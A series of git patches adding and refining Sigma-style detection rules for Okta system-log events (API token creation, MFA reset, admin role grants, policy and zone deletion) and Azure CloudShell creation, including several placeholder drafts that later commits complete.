b/rules/cloud/okta/okta_unauthorized_access_to_app.yml @@ -0,0 +1,21 @@ +title: Okta Unauthorized Access to App +id: 6cc2b61b-d97e-42ef-a9dd-8aa8dc951657 +description: Detects when unauthorized access to app occurs. +author: Austin Songer +status: experimental +date: 2021/09/12 +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + service: okta +detection: + selection: + displaymessage: + - User attempted unauthorized access to app + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - User might of believe that they had access. From 08e79bb22efe272603fd46a94021d76cb60c4ac5 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 19:40:49 -0500 Subject: [PATCH 0903/1367] Update okta_application_modified_or_deleted.yml --- .../okta_application_modified_or_deleted.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) diff --git a/rules/cloud/okta/okta_application_modified_or_deleted.yml b/rules/cloud/okta/okta_application_modified_or_deleted.yml index 41a74b12..ca73d4f7 100644 --- a/rules/cloud/okta/okta_application_modified_or_deleted.yml +++ b/rules/cloud/okta/okta_application_modified_or_deleted.yml @@ -1 +1,29 @@ NOT READY YET + +title: Okta +id: +description: Detects when an +author: Austin Songer +status: experimental +date: 2021/ +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + service: okta +detection: + selection: + eventtype: + - + - + displaymessage: + - + - + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Okta being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Okta modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 31ccf89dcc17dfb341eab79bd93cb9b739c805ae Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 19:41:00 -0500 Subject: [PATCH 0904/1367] Update okta_network_zone_deactivated_or_deleted.yml --- ...ta_network_zone_deactivated_or_deleted.yml | 30 ++++++++++++++++++- 1 file changed, 29 insertions(+), 1 deletion(-) diff --git a/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml b/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml index c3b70785..ca73d4f7 100644 --- a/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml +++ b/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml @@ -1 +1,29 @@ -NOT READ YET +NOT READY YET + +title: Okta +id: +description: Detects when an +author: Austin Songer +status: experimental +date: 2021/ +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + service: okta +detection: + selection: + eventtype: + - + - + displaymessage: + - + - + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Okta being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Okta modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 30823b72b24c713aa2cd3422e7cbd8ba6442d66a Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 19:41:14 -0500 Subject: [PATCH 0905/1367] Update okta_policy_rule_modified_or_deleted.yml --- .../okta_policy_rule_modified_or_deleted.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) diff --git a/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml b/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml index 41a74b12..ca73d4f7 100644 --- a/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml +++ b/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml @@ -1 +1,29 @@ NOT READY YET + +title: Okta +id: +description: Detects when an +author: Austin Songer +status: experimental +date: 2021/ +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + service: okta +detection: + selection: + eventtype: + - + - + displaymessage: + - + - + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Okta being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Okta modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 4d58194dab1150498272250324a4e6bcdd6023af Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 19:41:38 -0500 Subject: [PATCH 0906/1367] Update okta_user_account_mfa_bypass_attempt.yml --- .../okta_user_account_mfa_bypass_attempt.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) diff --git a/rules/cloud/okta/okta_user_account_mfa_bypass_attempt.yml b/rules/cloud/okta/okta_user_account_mfa_bypass_attempt.yml index 41a74b12..ca73d4f7 100644 --- a/rules/cloud/okta/okta_user_account_mfa_bypass_attempt.yml +++ b/rules/cloud/okta/okta_user_account_mfa_bypass_attempt.yml @@ -1 +1,29 @@ NOT READY YET + +title: Okta +id: +description: Detects when an +author: Austin Songer +status: experimental +date: 2021/ +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + service: okta +detection: + selection: + eventtype: + - + - + displaymessage: + - + - + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Okta being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Okta modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 7b371621078e2a8b88ed4beae8bec92d8f8a0b2c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 19:41:50 -0500 Subject: [PATCH 0907/1367] Update okta_user_account_mfa_reset.yml --- .../okta/okta_user_account_mfa_reset.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) diff --git a/rules/cloud/okta/okta_user_account_mfa_reset.yml b/rules/cloud/okta/okta_user_account_mfa_reset.yml index 41a74b12..ca73d4f7 100644 --- a/rules/cloud/okta/okta_user_account_mfa_reset.yml +++ b/rules/cloud/okta/okta_user_account_mfa_reset.yml @@ -1 +1,29 @@ NOT READY YET + +title: Okta +id: +description: Detects when an +author: Austin Songer +status: experimental +date: 2021/ +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + service: okta +detection: + selection: + eventtype: + - + - + displaymessage: + - + - + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Okta being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Okta modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 5f7e657319b016ed14bfacbd329cecfdcf0afad5 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 19:45:57 -0500 Subject: [PATCH 0908/1367] Create okta_admin_role_assigned_to_user_or_group.yml --- ...a_admin_role_assigned_to_user_or_group.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml diff --git a/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml b/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml new file mode 100644 index 00000000..1ded4c5d --- /dev/null +++ b/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml @@ -0,0 +1,23 @@ +title: Okta Admin Role Assigned to an User or Group +id: 413d4a81-6c98-4479-9863-014785fd579c +description: Detects when an the Administrator role is assigned to an user or group. +author: Austin Songer +status: experimental +date: 2021/09/12 +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + service: okta +detection: + selection: + eventtype: + - group.privilege.grant + - user.account.privilege.grant + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Administrator roles could be assigned to users or group by other admin users. + From 329c5e96fc187376ad74e951fc9e46b8e0a6eb3d Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 19:47:21 -0500 Subject: [PATCH 0909/1367] Create okta_api_token_created.yml --- rules/cloud/okta/okta_api_token_created.yml | 30 +++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 rules/cloud/okta/okta_api_token_created.yml diff --git a/rules/cloud/okta/okta_api_token_created.yml b/rules/cloud/okta/okta_api_token_created.yml new file mode 100644 index 00000000..dee79262 --- /dev/null +++ b/rules/cloud/okta/okta_api_token_created.yml @@ -0,0 +1,30 @@ +NOT READY YET + +title: Okta +id: +description: Detects when an +author: Austin Songer +status: experimental +date: 2021/ +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + service: okta +detection: + selection: + eventtype: + - + - + displaymessage: + - + - + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Okta being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Okta modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + From f2274379203e243034e9cd951b972ac834c519bb Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 19:47:59 -0500 Subject: [PATCH 0910/1367] Create okta_api_token_revoked.yml --- rules/cloud/okta/okta_api_token_revoked.yml | 29 +++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 rules/cloud/okta/okta_api_token_revoked.yml diff --git a/rules/cloud/okta/okta_api_token_revoked.yml b/rules/cloud/okta/okta_api_token_revoked.yml new file mode 100644 index 00000000..ca73d4f7 --- /dev/null +++ b/rules/cloud/okta/okta_api_token_revoked.yml @@ -0,0 +1,29 @@ +NOT READY YET + +title: Okta +id: +description: Detects when an +author: Austin Songer +status: experimental +date: 2021/ +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + service: okta +detection: + selection: + eventtype: + - + - + displaymessage: + - + - + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Okta being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Okta modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 715b6ecddaa6b76c1ef4ef2d2d31d77f59dbca6b Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 20:00:08 -0500 Subject: [PATCH 0911/1367] Create azure_new_cloudshell_created.yml --- .../azure/azure_new_cloudshell_created.yml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 rules/cloud/azure/azure_new_cloudshell_created.yml diff --git a/rules/cloud/azure/azure_new_cloudshell_created.yml b/rules/cloud/azure/azure_new_cloudshell_created.yml new file mode 100644 index 00000000..03afa08e --- /dev/null +++ b/rules/cloud/azure/azure_new_cloudshell_created.yml @@ -0,0 +1,21 @@ +title: Azure New CloudShell Created +id: 72af37e2-ec32-47dc-992b-bc288a2708cb +description: Identifies when a new cloudshell is created inside of Azure portal. +author: Austin Songer +status: experimental +date: 2021/09/21 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: MICROSOFT.PORTAL/CONSOLES/WRITE + condition: selection +level: medium +tags: + - attack.execution + - attack.t1059 +falsepositives: + - A new cloudshell may be created by a system administrator. + From aa8978e9da53bfb6ecb8c26442b32398fecbd0e4 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 20:14:27 -0500 Subject: [PATCH 0912/1367] Update okta_api_token_created.yml --- rules/cloud/okta/okta_api_token_created.yml | 24 ++++++--------------- 1 file changed, 7 insertions(+), 17 deletions(-) diff --git a/rules/cloud/okta/okta_api_token_created.yml b/rules/cloud/okta/okta_api_token_created.yml index dee79262..a4a49a16 100644 --- a/rules/cloud/okta/okta_api_token_created.yml +++ b/rules/cloud/okta/okta_api_token_created.yml @@ -1,11 +1,9 @@ -NOT READY YET - -title: Okta -id: -description: Detects when an +title: Okta API Token Created +id: 19951c21-229d-4ccb-8774-b993c3ff3c5c +description: Detects when a API token is created author: Austin Songer status: experimental -date: 2021/ +date: 2021/09/12 references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ @@ -13,18 +11,10 @@ logsource: service: okta detection: selection: - eventtype: - - - - - displaymessage: - - - - + eventtype: system.api_token.create condition: selection level: medium tags: - - attack.impact + - attack.persistence falsepositives: - - Okta being modified or deleted may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Okta modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. - + - Unknown From 9f7033687997142f04c3359edba7be23242d9ec8 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 20:16:37 -0500 Subject: [PATCH 0913/1367] Update okta_api_token_revoked.yml --- rules/cloud/okta/okta_api_token_revoked.yml | 22 +++++++-------------- 1 file changed, 7 insertions(+), 15 deletions(-) diff --git a/rules/cloud/okta/okta_api_token_revoked.yml b/rules/cloud/okta/okta_api_token_revoked.yml index ca73d4f7..76738fb9 100644 --- a/rules/cloud/okta/okta_api_token_revoked.yml +++ b/rules/cloud/okta/okta_api_token_revoked.yml @@ -1,11 +1,9 @@ -NOT READY YET - -title: Okta -id: -description: Detects when an +title: Okta API Token Revoked +id: cf1dbc6b-6205-41b4-9b88-a83980d2255b +description: Detects when a API Token is revoked. author: Austin Songer status: experimental -date: 2021/ +date: 2021/09/12 references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ @@ -13,17 +11,11 @@ logsource: service: okta detection: selection: - eventtype: - - - - - displaymessage: - - - - + eventtype: system.api_token.revoke condition: selection level: medium tags: - attack.impact falsepositives: - - Okta being modified or deleted may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Okta modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Unknown + From 45b6ac72eeb1c0cbe38dee923431066b509094e3 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 20:19:57 -0500 Subject: [PATCH 0914/1367] Update okta_application_modified_or_deleted.yml --- .../okta_application_modified_or_deleted.yml | 22 +++++++------------ 1 file changed, 8 insertions(+), 14 deletions(-) diff --git a/rules/cloud/okta/okta_application_modified_or_deleted.yml b/rules/cloud/okta/okta_application_modified_or_deleted.yml index ca73d4f7..63401971 100644 --- a/rules/cloud/okta/okta_application_modified_or_deleted.yml +++ b/rules/cloud/okta/okta_application_modified_or_deleted.yml @@ -1,11 +1,9 @@ -NOT READY YET - -title: Okta -id: -description: Detects when an +title: Okta Application Modified or Deleted +id: 7899144b-e416-4c28-b0b5-ab8f9e0a541d +description: Detects when an application is modified or deleted. author: Austin Songer status: experimental -date: 2021/ +date: 2021/09/12 references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ @@ -14,16 +12,12 @@ logsource: detection: selection: eventtype: - - - - - displaymessage: - - - - + - application.lifecycle.update + - application.lifecycle.delete condition: selection level: medium tags: - attack.impact falsepositives: - - Okta being modified or deleted may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Okta modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Unknown + From e60fbbf4b8b0e3b1ab30d3eff915dc397324aaf8 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 20:22:16 -0500 Subject: [PATCH 0915/1367] Update okta_network_zone_deactivated_or_deleted.yml --- ...ta_network_zone_deactivated_or_deleted.yml | 22 +++++++------------ 1 file changed, 8 insertions(+), 14 deletions(-) diff --git a/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml b/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml index ca73d4f7..5d174c95 100644 --- a/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml +++ b/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml @@ -1,11 +1,9 @@ -NOT READY YET - -title: Okta -id: -description: Detects when an +title: Okta Network Zone Deactivated or Deleted +id: 9f308120-69ed-4506-abde-ac6da81f4310 +description: Detects when an Network Zone is Deactivated or Deleted. author: Austin Songer status: experimental -date: 2021/ +date: 2021/09/12 references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ @@ -14,16 +12,12 @@ logsource: detection: selection: eventtype: - - - - - displaymessage: - - - - + - zone.deactivate + - zone.delete condition: selection level: medium tags: - attack.impact falsepositives: - - Okta being modified or deleted may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Okta modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Unknown + From f759fff453f727d93e562e1b40f1f118a928d6d1 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 20:24:12 -0500 Subject: [PATCH 0916/1367] Update okta_policy_rule_modified_or_deleted.yml --- .../okta_policy_rule_modified_or_deleted.yml | 22 +++++++------------ 1 file changed, 8 insertions(+), 14 deletions(-) diff --git a/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml b/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml index ca73d4f7..81cbea62 100644 --- a/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml +++ b/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml @@ -1,11 +1,9 @@ -NOT READY YET - -title: Okta -id: -description: Detects when an +title: Okta Policy Rule Modified or Deleted +id: 0c97c1d3-4057-45c9-b148-1de94b631931v +description: Detects when an Policy Rule is Modified or Deleted. author: Austin Songer status: experimental -date: 2021/ +date: 2021/09/12 references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ @@ -14,16 +12,12 @@ logsource: detection: selection: eventtype: - - - - - displaymessage: - - - - + - policy.rule.update + - policy.rule.delete condition: selection level: medium tags: - attack.impact falsepositives: - - Okta being modified or deleted may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Okta modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Unknown + From 249d3198d33dd723d5554372162c2bea191f9213 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 20:27:45 -0500 Subject: [PATCH 0917/1367] Create okta_application_sign-on_policy_modified_or_deleted.yml --- ...ion_sign-on_policy_modified_or_deleted.yml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml diff --git a/rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml b/rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml new file mode 100644 index 00000000..47fd37e7 --- /dev/null +++ b/rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml @@ -0,0 +1,22 @@ +title: Okta Application Sign-On Policy Modified or Deleted +id: Application Sign-On Policy +description: Detects when an application Sign-on Policy is modified or deleted. +author: Austin Songer +status: experimental +date: 2021/09/12 +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + service: okta +detection: + selection: + eventtype: + - application.policy.sign_on.update + - application.policy.sign_on.rule.delete + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Unknown From bec7b5d3e79a8dfed0d526c9f159aa0cd5c47550 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 20:33:27 -0500 Subject: [PATCH 0918/1367] Create okta_security_threat_detected.yml --- .../okta/okta_security_threat_detected.yml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 rules/cloud/okta/okta_security_threat_detected.yml diff --git a/rules/cloud/okta/okta_security_threat_detected.yml b/rules/cloud/okta/okta_security_threat_detected.yml new file mode 100644 index 00000000..1284f8c9 --- /dev/null +++ b/rules/cloud/okta/okta_security_threat_detected.yml @@ -0,0 +1,19 @@ +title: Okta Security Threat Detected +id: 5c82f0b9-3c6d-477f-a318-0e14a1df73e0 +description: Detects when an security threat is detected in Okta. +author: Austin Songer +status: experimental +date: 2021/09/12 +references: + - https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + service: okta +detection: + selection: + eventtype: security.threat.detected + condition: selection +level: medium +falsepositives: + - None From 1f5e2577cbbdd4b2bd9f3a633a2f6529950c1355 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 20:34:37 -0500 Subject: [PATCH 0919/1367] Delete okta_user_account_mfa_reset.yml --- .../okta/okta_user_account_mfa_reset.yml | 29 ------------------- 1 file changed, 29 deletions(-) delete mode 100644 rules/cloud/okta/okta_user_account_mfa_reset.yml diff --git a/rules/cloud/okta/okta_user_account_mfa_reset.yml b/rules/cloud/okta/okta_user_account_mfa_reset.yml deleted file mode 100644 index ca73d4f7..00000000 --- a/rules/cloud/okta/okta_user_account_mfa_reset.yml +++ /dev/null @@ -1,29 +0,0 @@ -NOT READY YET - -title: Okta -id: -description: Detects when an -author: Austin Songer -status: experimental -date: 2021/ -references: - - https://developer.okta.com/docs/reference/api/system-log/ - - https://developer.okta.com/docs/reference/api/event-types/ -logsource: - service: okta -detection: - selection: - eventtype: - - - - - displaymessage: - - - - - condition: selection -level: medium -tags: - - attack.impact -falsepositives: - - Okta being modified or deleted may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Okta modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 01c985b99adddf66d6a7cba9b0e9e5aa9b5b9a1b Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 20:40:33 -0500 Subject: [PATCH 0920/1367] Update and rename okta_user_account_mfa_bypass_attempt.yml to okta_mfa_reset_or_deactivated.yml --- .../okta/okta_mfa_reset_or_deactivated.yml | 22 ++++++++++++++ .../okta_user_account_mfa_bypass_attempt.yml | 29 ------------------- 2 files changed, 22 insertions(+), 29 deletions(-) create mode 100644 rules/cloud/okta/okta_mfa_reset_or_deactivated.yml delete mode 100644 rules/cloud/okta/okta_user_account_mfa_bypass_attempt.yml diff --git a/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml b/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml new file mode 100644 index 00000000..ba789082 --- /dev/null +++ b/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml @@ -0,0 +1,22 @@ +title: Okta MFA Reset or Deactivated +id: 50e068d7-1e6b-4054-87e5-0a592c40c7e0 +description: Detects when an attempt at deactivating or resetting MFA. +author: Austin Songer +status: experimental +date: 2021/09/21 +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + service: okta +detection: + selection: + eventtype: + - user.mfa.factor.deactivate + - user.mfa.factor.reset_all + condition: selection +level: medium +tags: + - attack.persistence +falsepositives: + - If a MFA reset or deactivated was performed by a system administrator. diff --git a/rules/cloud/okta/okta_user_account_mfa_bypass_attempt.yml b/rules/cloud/okta/okta_user_account_mfa_bypass_attempt.yml deleted file mode 100644 index ca73d4f7..00000000 --- a/rules/cloud/okta/okta_user_account_mfa_bypass_attempt.yml +++ /dev/null @@ -1,29 +0,0 @@ -NOT READY YET - -title: Okta -id: -description: Detects when an -author: Austin Songer -status: experimental -date: 2021/ -references: - - https://developer.okta.com/docs/reference/api/system-log/ - - https://developer.okta.com/docs/reference/api/event-types/ -logsource: - service: okta -detection: - selection: - eventtype: - - - - - displaymessage: - - - - - condition: selection -level: medium -tags: - - attack.impact -falsepositives: - - Okta being modified or deleted may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Okta modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From e1ef3857fb53787457b0c8cb07b390be50196b45 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 20:49:44 -0500 Subject: [PATCH 0921/1367] Update and rename okta_user_account_lockout.yml to okta_user_account_locked_out.yml --- ...ser_account_lockout.yml => okta_user_account_locked_out.yml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename rules/cloud/okta/{okta_user_account_lockout.yml => okta_user_account_locked_out.yml} (93%) diff --git a/rules/cloud/okta/okta_user_account_lockout.yml b/rules/cloud/okta/okta_user_account_locked_out.yml similarity index 93% rename from rules/cloud/okta/okta_user_account_lockout.yml rename to rules/cloud/okta/okta_user_account_locked_out.yml index 92fd1081..0b5c5930 100644 --- a/rules/cloud/okta/okta_user_account_lockout.yml +++ b/rules/cloud/okta/okta_user_account_locked_out.yml @@ -1,4 +1,4 @@ -title: Okta User Account Lock out +title: Okta User Account Locked Out id: 14701da0-4b0f-4ee6-9c95-2ffb4e73bb9a description: Detects when an user account is locked out. author: Austin Songer From 18223a37cde617bcd55fcad60370208893c93e04 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 13 Sep 2021 06:26:01 +0200 Subject: [PATCH 0922/1367] Update okta_application_sign-on_policy_modified_or_deleted.yml --- .../okta_application_sign-on_policy_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml b/rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml index 47fd37e7..3b067027 100644 --- a/rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml +++ b/rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml @@ -1,5 +1,5 @@ title: Okta Application Sign-On Policy Modified or Deleted -id: Application Sign-On Policy +id: 8f668cc4-c18e-45fe-ad00-624a981cf88a description: Detects when an application Sign-on Policy is modified or deleted. author: Austin Songer status: experimental From e4d3d313c7546e8b59adc0aa69015d13fa95bdec Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 13 Sep 2021 06:33:49 +0200 Subject: [PATCH 0923/1367] Update okta_policy_rule_modified_or_deleted.yml --- rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml b/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml index 81cbea62..0cc96a97 100644 --- a/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml +++ b/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml @@ -1,5 +1,5 @@ title: Okta Policy Rule Modified or Deleted -id: 0c97c1d3-4057-45c9-b148-1de94b631931v +id: 0c97c1d3-4057-45c9-b148-1de94b631931 description: Detects when an Policy Rule is Modified or Deleted. author: Austin Songer status: experimental From 8e1f36ec3997404c989ad65da9f837ec2673ab1f Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 23:34:08 -0500 Subject: [PATCH 0924/1367] Update okta_api_token_created.yml --- rules/cloud/okta/okta_api_token_created.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/okta/okta_api_token_created.yml b/rules/cloud/okta/okta_api_token_created.yml index a4a49a16..99bff4e8 100644 --- a/rules/cloud/okta/okta_api_token_created.yml +++ b/rules/cloud/okta/okta_api_token_created.yml @@ -18,3 +18,4 @@ tags: - attack.persistence falsepositives: - Unknown + From 4ae1d4198357afdf31e0c4195c5d8ddbeb24a405 Mon Sep 17 00:00:00 2001 From: pbssubhash Date: Mon, 13 Sep 2021 10:16:02 +0530 Subject: [PATCH 0925/1367] Corrected Rules - Logsource --- ...web_cve-2010-0943_exploitation_attempt.yml | 4 +++- ...web_cve-2010-0944_exploitation_attempt.yml | 4 +++- ...web_cve-2010-0985_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1219_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1304_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1305_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1306_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1307_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1308_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1312_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1313_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1314_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1345_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1353_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1354_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1470_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1471_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1472_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1473_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1474_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1475_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1476_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1494_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1495_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1532_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1533_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1534_exploitation_attempt.yml | 4 +++- ...web_cve-2010-1535_exploitation_attempt.yml | 4 +++- 